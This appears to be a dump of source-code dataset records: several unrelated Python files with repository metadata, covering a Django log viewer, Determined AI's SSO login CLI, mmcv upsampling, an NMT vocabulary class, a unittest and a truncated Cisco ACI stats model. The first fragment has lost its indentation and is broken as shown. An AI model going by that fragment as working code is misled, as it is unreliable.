res_dic['pass'], log_file_path, self.line_num)
# print('-------------',log_res)
            # record this access in the audit log
audit_log = Operation_dbModelClass()
audit_log.inserToLog(self.request.user.username, self.ip, 'access', self.request.path, log_file_path)
return log_res
else:
runlog.info("the APP type is not tomcat, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
return 'just for app-type like tomcat..'
def logDir(self):
        # shape of the returned dict
data = {
'project_id': self.project_id,
'env_id': self.env_id,
'app_id': self.app_id,
'server_type': self.server_type,
'server_id': self.server_id,
'ip': self.ip,
}
if self.app_id == '':
runlog.error("[ERROR] -getlogdir-wrong action args from web-----, Catch exception:, file: [ %s ], line: [ %s ]"
%(__file__,sys._getframe().f_lineno))
if not pub.hasAccessPermission(self.uid, self.server_type, self.server_id):
return ['no permissions to view']
# 获取app的用户名和密码
instance = appConfigDetailClass.appConfigDetail()
res, status= instance.AppConfigDetail(self.server_type, self.app_id, self.server_id, self.env_id,
self.project_id)
print('logapp--res', res)
if not status:
runlog.error("the APP Data is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
data['user'] = res[0][1]
        res_dir = instance.whole_appLogDirs(self.app_id, self.server_type, self.server_id)  # look up every log directory configured for this app id
print('whole_appLogDirs------>\033[42;1m%s\033[0m' % res_dir)
if len(res_dir) == 0:
            print('no logdir found...')
return {}
res_list = []
for i in res_dir:
res_dic = dict()
res_dic['id'] = i[1]
res_dic['dir'] = i[0]
res_list.append(res_dic)
data['logdirs'] = res_list
return data
    def getlogInfo(self):  # fetch details (size, owner, mtime, ...) for every log file under the app's log directory
logdir_id = self.request.GET.get('logdir_id', '')
        # Validate the parameters passed from the front end
if self.project_id == '' or self.env_id == '' or self.app_id == '' or self.ip == ''\
or self.server_type == '' or self.server_id == '' or logdir_id == '':
# print(self.project_id,self.env_id,self.app_id,self.ip,self.server_type,self.server_id,logdir_id)
            # print('getLogInfo: invalid action args from web...')
            runlog.error("[ERROR] getLogInfo: wrong action args from web, file: [ %s ], line: [ %s ]"
                         % (__file__, sys._getframe().f_lineno))
            return 'invalid action args from web...'
if not pub.hasAccessPermission(self.uid, self.server_type, self.server_id):
runlog.error("[ERROR] --no permission-----, Catch exception:, file: [ %s ], line: [ %s ]"
%(__file__,sys._getframe().f_lineno))
return {}
instance = appConfigDetailClass.appConfigDetail()
res_dir = instance.app_LogDir(self.app_id, self.server_type, self.server_id, logdir_id)
if len(res_dir) == 0:
return {}
# 获取app的用户名和密码
instance = appConfigDetailClass.appConfigDetail()
res, Status = instance.AppConfigDetail(self.server_type, self.app_id, self.server_id, self.env_id,
self.project_id)
        # print('logapp--res', res)
if not Status:
runlog.error("the APP Data is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
        pk = ParamikoTool()  # instantiate; the helper lists the directory's files sorted by time, with sizes
data_res, status = pk.getDirInfo(self.ip, res[0][8], res[0][9], res[0][7], res_dir[0][0])
# '''data='-rw-rw-r-- 1 beehive beehive 22900 Feb 8 2017 catalina.2017-02-08.log\n
# -rw-rw-r-- 1 beehive beehive 171910 Feb 9 2017 catalina.2017-02-09.log\n
        # print('data_res------>\033[31;1m%s\033[0m' % data_res)
if not status:
runlog.error("getDirInfo is null, file: [ %s ], line: [ %s ],error:[ %s ]" % (
__file__, sys._getframe().f_lineno, data_res))
        final_data_dic = dict()  # wrap the result in a dict before returning
final_data_dic['data'] = data_res
return final_data_dic
| [
"[email protected]"
] | |
150031906408644576efe4932f757a1e0abf4fa8 | ddddaa700e4642f46a2c1e1e0271a7c8ea62ba0f | /harness/determined/cli/sso.py | 026b6b502e98d88856d356e481ab9bf2cf8167e6 | [
"Apache-2.0"
] | permissive | determined-ai/determined | 9d563cb5ffd074c88ee5edc9bf22ab9c3cb78c7e | 8239b1993f4f44390f4e88901ffaf3b12429b83c | refs/heads/main | 2023-08-21T12:13:36.651298 | 2023-08-21T08:34:16 | 2023-08-21T08:34:16 | 253,846,879 | 2,531 | 330 | Apache-2.0 | 2023-09-14T21:54:17 | 2020-04-07T16:12:29 | Go | UTF-8 | Python | false | false | 5,240 | py | import sys
import webbrowser
from argparse import Namespace
from getpass import getpass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Callable, List
from urllib.parse import parse_qs, urlparse
from determined.common import api
from determined.common.api import authentication
from determined.common.declarative_argparse import Arg, Cmd
from determined.errors import EnterpriseOnlyError
CLI_REDIRECT_PORT = 49176
def handle_token(master_url: str, token: str) -> None:
tmp_auth = {"Cookie": "auth={token}".format(token=token)}
me = api.get(master_url, "/users/me", headers=tmp_auth, authenticated=False).json()
token_store = authentication.TokenStore(master_url)
token_store.set_token(me["username"], token)
token_store.set_active(me["username"])
print("Authenticated as {}.".format(me["username"]))
def make_handler(master_url: str, close_cb: Callable[[int], None]) -> Any:
class TokenAcceptHandler(BaseHTTPRequestHandler):
def do_GET(self) -> None:
try:
"""Serve a GET request."""
token = parse_qs(urlparse(self.path).query)["token"][0]
handle_token(master_url, token)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"You can close this window now.")
close_cb(0)
except Exception as e:
print("Error authenticating: {}.".format(e))
close_cb(1)
def log_message(self, format: Any, *args: List[Any]) -> None: # noqa: A002
# Silence server logging.
return
return TokenAcceptHandler
def sso(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if not sso_providers:
print("No SSO providers found.")
return
elif not parsed_args.provider:
if len(sso_providers) > 1:
print("Provider must be specified when multiple are available.")
return
matched_provider = sso_providers[0]
else:
matching_providers = [
p for p in sso_providers if p["name"].lower() == parsed_args.provider.lower()
]
if not matching_providers:
ps = ", ".join(p["name"].lower() for p in sso_providers)
print("Provider {} unsupported. (Providers found: {})".format(parsed_args.provider, ps))
return
elif len(matching_providers) > 1:
print("Multiple SSO providers found with name {}.".format(parsed_args.provider))
return
matched_provider = matching_providers[0]
sso_url = matched_provider["sso_url"] + "?relayState=cli"
if not parsed_args.headless:
if webbrowser.open(sso_url):
print(
"Your browser should open and prompt you to sign on;"
" if it did not, please visit {}".format(sso_url)
)
print("Killing this process before signing on will cancel authentication.")
with HTTPServer(
("localhost", CLI_REDIRECT_PORT),
make_handler(parsed_args.master, lambda code: sys.exit(code)),
) as httpd:
return httpd.serve_forever()
print("Failed to open Web Browser. Falling back to --headless CLI mode.")
example_url = f"Example: 'http://localhost:{CLI_REDIRECT_PORT}/?token=v2.public.[long_str]'"
print(
f"Please open this URL in your browser: '{sso_url}'\n"
"After authenticating, copy/paste the localhost URL "
f"from your browser into the prompt.\n{example_url}"
)
token = None
while not token:
user_input_url = getpass(prompt="\n(hidden) localhost URL? ")
try:
token = parse_qs(urlparse(user_input_url).query)["token"][0]
handle_token(parsed_args.master, token)
except (KeyError, IndexError):
print(f"Could not extract token from localhost URL. {example_url}")
def list_providers(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if len(sso_providers) == 0:
print("No SSO providers found.")
return
print("Available providers: " + ", ".join(provider["name"] for provider in sso_providers) + ".")
# fmt: off
args_description = [
Cmd("auth", None, "manage auth", [
Cmd("login", sso, "sign on with an auth provider", [
Arg("-p", "--provider", type=str,
help="auth provider to use (not needed if the Determined master only supports"
" one provider)"),
Arg("--headless", action="store_true", help="force headless cli auth")
]),
Cmd("list-providers", list_providers, "lists the available auth providers", []),
])
] # type: List[Any]
# fmt: on
| [
"[email protected]"
] | |
01f149a939d7ee4687c0ce58037ed05278e16865 | 04142fdda9b3fb29fb7456d5bc3e504985f24cbe | /mmcv/cnn/bricks/upsample.py | 78fb5bf371712d13a72edf5d57151dca8fce6953 | [
"Apache-2.0"
] | permissive | open-mmlab/mmcv | 419e301bbc1d7d45331d67eccfd673f290a796d5 | 6e9ee26718b22961d5c34caca4108413b1b7b3af | refs/heads/main | 2023-08-31T07:08:27.223321 | 2023-08-28T09:02:10 | 2023-08-28T09:02:10 | 145,670,155 | 5,319 | 1,900 | Apache-2.0 | 2023-09-14T02:37:16 | 2018-08-22T07:05:26 | Python | UTF-8 | Python | false | false | 3,299 | py | # Copyright (c) OpenMMLab. All rights reserved.
import inspect
from typing import Dict
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmengine.model import xavier_init
from mmengine.registry import MODELS
MODELS.register_module('nearest', module=nn.Upsample)
MODELS.register_module('bilinear', module=nn.Upsample)
@MODELS.register_module(name='pixel_shuffle')
class PixelShufflePack(nn.Module):
"""Pixel Shuffle upsample layer.
This module packs `F.pixel_shuffle()` and a nn.Conv2d module together to
achieve a simple upsampling with pixel shuffle.
Args:
in_channels (int): Number of input channels.
out_channels (int): Number of output channels.
scale_factor (int): Upsample ratio.
upsample_kernel (int): Kernel size of the conv layer to expand the
channels.
"""
def __init__(self, in_channels: int, out_channels: int, scale_factor: int,
upsample_kernel: int):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.scale_factor = scale_factor
self.upsample_kernel = upsample_kernel
self.upsample_conv = nn.Conv2d(
self.in_channels,
self.out_channels * scale_factor * scale_factor,
self.upsample_kernel,
padding=(self.upsample_kernel - 1) // 2)
self.init_weights()
def init_weights(self):
xavier_init(self.upsample_conv, distribution='uniform')
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.upsample_conv(x)
x = F.pixel_shuffle(x, self.scale_factor)
return x
def build_upsample_layer(cfg: Dict, *args, **kwargs) -> nn.Module:
"""Build upsample layer.
Args:
cfg (dict): The upsample layer config, which should contain:
- type (str): Layer type.
- scale_factor (int): Upsample ratio, which is not applicable to
deconv.
- layer args: Args needed to instantiate a upsample layer.
args (argument list): Arguments passed to the ``__init__``
method of the corresponding conv layer.
kwargs (keyword arguments): Keyword arguments passed to the
``__init__`` method of the corresponding conv layer.
Returns:
nn.Module: Created upsample layer.
"""
if not isinstance(cfg, dict):
raise TypeError(f'cfg must be a dict, but got {type(cfg)}')
if 'type' not in cfg:
raise KeyError(
f'the cfg dict must contain the key "type", but got {cfg}')
cfg_ = cfg.copy()
layer_type = cfg_.pop('type')
if inspect.isclass(layer_type):
upsample = layer_type
# Switch registry to the target scope. If `upsample` cannot be found
# in the registry, fallback to search `upsample` in the
# mmengine.MODELS.
else:
with MODELS.switch_scope_and_registry(None) as registry:
upsample = registry.get(layer_type)
if upsample is None:
raise KeyError(f'Cannot find {upsample} in registry under scope '
f'name {registry.scope}')
if upsample is nn.Upsample:
cfg_['mode'] = layer_type
layer = upsample(*args, **kwargs, **cfg_)
return layer
| [
"[email protected]"
] | |
697a14ba16fec12bc6822c838c5c9307b462870a | 4d7f743f871860e64f7e1e057b32c8af76fe98ff | /nmtlab/utils/vocab.py | 893b2a2fcfcb1d9146383a199150e541bf465ee5 | [
"MIT"
] | permissive | MarkWuNLP/nmtlab | 8a822c7d2385f885509b9b3e5d039b8fc38562ad | da9c28126336528fc6b85f2d424632ad227a3682 | refs/heads/master | 2022-02-21T14:05:10.523962 | 2019-10-05T08:32:21 | 2019-10-05T08:32:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,111 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torchtext.vocab
import pickle
from collections import Counter, defaultdict
DEFAULT_SPECIAL_TOKENS = ["<null>", "<s>", "</s>", "UNK"]
class Vocab(torchtext.vocab.Vocab):
def __init__(self, path=None, unk_token="UNK", picklable=False):
self._unk_token = unk_token
self.itos = []
if picklable:
self.stoi = {}
else:
self.stoi = defaultdict(lambda: 3)
if path:
self.load(path)
def size(self):
return len(self.itos)
def initialize(self, special_tokens=None):
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
self.itos = special_tokens
self._build_vocab_map()
def build(self, txt_path, limit=None, special_tokens=None, char_level=False, field=None, delim="\t"):
vocab_counter = Counter()
for line in open(txt_path):
line = line.strip()
if field is not None:
line = line.split(delim)[field]
if char_level:
            # line is already a str under Python 3 (text-mode open above), so
            # just split it into individual characters for char-level vocabularies
            words = list(line)
else:
words = line.split(" ")
vocab_counter.update(words)
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
if limit is not None:
final_items = vocab_counter.most_common()[:limit - len(special_tokens)]
else:
final_items = vocab_counter.most_common()
final_items.sort(key=lambda x: (-x[1], x[0]))
final_words = [x[0] for x in final_items]
self.itos = special_tokens + final_words
self._build_vocab_map()
def set_vocab(self, unique_tokens, special_tokens=True):
if special_tokens:
self.itos = DEFAULT_SPECIAL_TOKENS + unique_tokens
else:
self.itos = unique_tokens
self._build_vocab_map()
def add(self, token):
if token not in self.stoi:
self.itos.append(token)
self.stoi[token] = self.itos.index(token)
def save(self, path):
pickle.dump(self.itos, open(path, "wb"))
def load(self, path):
with open(path, "rb") as f:
self.itos = pickle.load(f, encoding='utf-8')
self._build_vocab_map()
def _build_vocab_map(self):
self.stoi.update({tok: i for i, tok in enumerate(self.itos)})
def encode(self, tokens):
return list(map(self.encode_token, tokens))
def encode_token(self, token):
if token in self.stoi:
return self.stoi[token]
else:
return self.stoi[self._unk_token]
def decode(self, indexes):
return list(map(self.decode_token, indexes))
def decode_token(self, index):
return self.itos[index] if index < len(self.itos) else self._unk_token
def contains(self, token):
return token in self.stoi
def get_list(self):
return self.itos
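
if __name__ == '__main__':
    # Minimal usage sketch (illustrative only): build a tiny in-memory
    # vocabulary and round-trip a sentence through encode/decode.
    vocab = Vocab()
    vocab.set_vocab(["hello", "world"])  # prepends the default special tokens
    ids = vocab.encode(["hello", "unseen", "world"])
    print(ids)                # the unseen token maps to the UNK index (3)
    print(vocab.decode(ids))  # ['hello', 'UNK', 'world']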
| [
"[email protected]"
] | |
e2666f46d0fa645869fb18bacd4d1c27777b444b | 1c2a0411f9cd24ad3076a7c85baeb7d72cd91c6f | /app_meta/admin.py | 680fe8ae84b8d8946d1f698f52786b3a719551e4 | [] | no_license | eshandas/django_scrapy_project_template | a98b75f5da5a5eeba16fd51be0347ad28432ce79 | 5eb2a2787727569e03f24a9f4bd75add37ddf9bb | refs/heads/master | 2021-01-19T13:06:18.712611 | 2017-04-29T15:48:08 | 2017-04-29T15:48:08 | 88,064,034 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | from django.contrib import admin
from .models import (
KeyValueSetting,
)
admin.site.register(KeyValueSetting)
| [
"[email protected]"
] | |
0ff47b51128d4c3f179c4ff101481282d1461151 | 47fabc7be3769cb1d2d17369efe2048818158477 | /test/test_multinomial_splitting.py | fb9f8105646ef967184adf4470dbd210056f4169 | [
"Apache-2.0"
] | permissive | jpeyhardi/GLM | 35ae651c4aa9771fec63b7c151858e0555a80c07 | 6f0fd763aec2a0ccdef3901b71ed990f20119510 | refs/heads/master | 2021-09-26T08:50:08.938073 | 2018-10-28T13:22:24 | 2018-10-28T13:22:24 | 125,999,551 | 0 | 0 | Apache-2.0 | 2018-03-20T10:21:13 | 2018-03-20T10:21:09 | C++ | UTF-8 | Python | false | false | 1,223 | py | from statiskit import (linalg,
core,
glm)
from statiskit.data import glm as data
import unittest
from nose.plugins.attrib import attr
import math
@attr(linux=True,
osx=True,
win=True,
level=0)
class TestMultinomialSplittingRegression(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Test Multinomial splitting regression construction"""
cls._data = data.load('KN03')
# def test_Fisher_estimation(self):
# """Test negative binomial regression Fisher estimation"""
# data = self._data.extract(explanatories=range(len(self._data.components) - 1),
# response=-1)
# fe = glm.negative_binomial_estimation(algo='Fisher',
# data=data,
# kappa=1.274892646)
# self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.15, places=2)
# # self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.61, places=2)
@classmethod
def tearDownClass(cls):
"""Test Negative Binomial regression deletion"""
del cls._data | [
"[email protected]"
] | |
3e1c5077ecb243ee0421f0cc303f389c21b8d623 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqpt/fanstats1d.py | ca82eee313ce110542aa85b5984e92415bd750ea | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 18,404 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class FanStats1d(Mo):
"""
A class that represents the most current statistics for fan in a 1 day sampling interval. This class updates every hour.
"""
meta = StatsClassMeta("cobra.model.eqpt.FanStats1d", "fan")
counter = CounterMeta("pwm", CounterCategory.GAUGE, "pwm", "pulse width modulation")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "pwmLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pwmMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pwmMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pwmAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pwmSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "pwmTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pwmThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "pwmTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pwmTr"
meta._counters.append(counter)
counter = CounterMeta("speed", CounterCategory.GAUGE, "rpm", "speed")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "speedLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "speedMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "speedMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "speedAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "speedSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "speedTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "speedThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "speedTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "speedTr"
meta._counters.append(counter)
meta.moClassName = "eqptFanStats1d"
meta.rnFormat = "CDeqptFanStats1d"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current fan stats in 1 day"
meta.writeAccessMask = 0x80080000000001
meta.readAccessMask = 0x80080000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.eqpt.Fan")
meta.superClasses.add("cobra.model.eqpt.FanStats")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.rnPrefixes = [
('CDeqptFanStats1d', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "pwmAvg", "pwmAvg", 8243, PropCategory.IMPLICIT_AVG)
prop.label = "pulse width modulation average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmAvg", prop)
prop = PropMeta("str", "pwmLast", "pwmLast", 8240, PropCategory.IMPLICIT_LASTREADING)
prop.label = "pulse width modulation current value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmLast", prop)
prop = PropMeta("str", "pwmMax", "pwmMax", 8242, PropCategory.IMPLICIT_MAX)
prop.label = "pulse width modulation maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmMax", prop)
prop = PropMeta("str", "pwmMin", "pwmMin", 8241, PropCategory.IMPLICIT_MIN)
prop.label = "pulse width modulation minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmMin", prop)
prop = PropMeta("str", "pwmSpct", "pwmSpct", 8244, PropCategory.IMPLICIT_SUSPECT)
prop.label = "pulse width modulation suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmSpct", prop)
prop = PropMeta("str", "pwmThr", "pwmThr", 8246, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "pulse width modulation thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pwmThr", prop)
prop = PropMeta("str", "pwmTr", "pwmTr", 8248, PropCategory.IMPLICIT_TREND)
prop.label = "pulse width modulation trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmTr", prop)
prop = PropMeta("str", "pwmTrBase", "pwmTrBase", 8247, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "pulse width modulation trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmTrBase", prop)
prop = PropMeta("str", "pwmTtl", "pwmTtl", 8245, PropCategory.IMPLICIT_TOTAL)
prop.label = "pulse width modulation total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmTtl", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "speedAvg", "speedAvg", 8264, PropCategory.IMPLICIT_AVG)
prop.label = "speed average value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedAvg", prop)
prop = PropMeta("str", "speedLast", "speedLast", 8261, PropCategory.IMPLICIT_LASTREADING)
prop.label = "speed current value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedLast", prop)
prop = PropMeta("str", "speedMax", "speedMax", 8263, PropCategory.IMPLICIT_MAX)
prop.label = "speed maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedMax", prop)
prop = PropMeta("str", "speedMin", "speedMin", 8262, PropCategory.IMPLICIT_MIN)
prop.label = "speed minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedMin", prop)
prop = PropMeta("str", "speedSpct", "speedSpct", 8265, PropCategory.IMPLICIT_SUSPECT)
prop.label = "speed suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("speedSpct", prop)
prop = PropMeta("str", "speedThr", "speedThr", 8267, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "speed thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
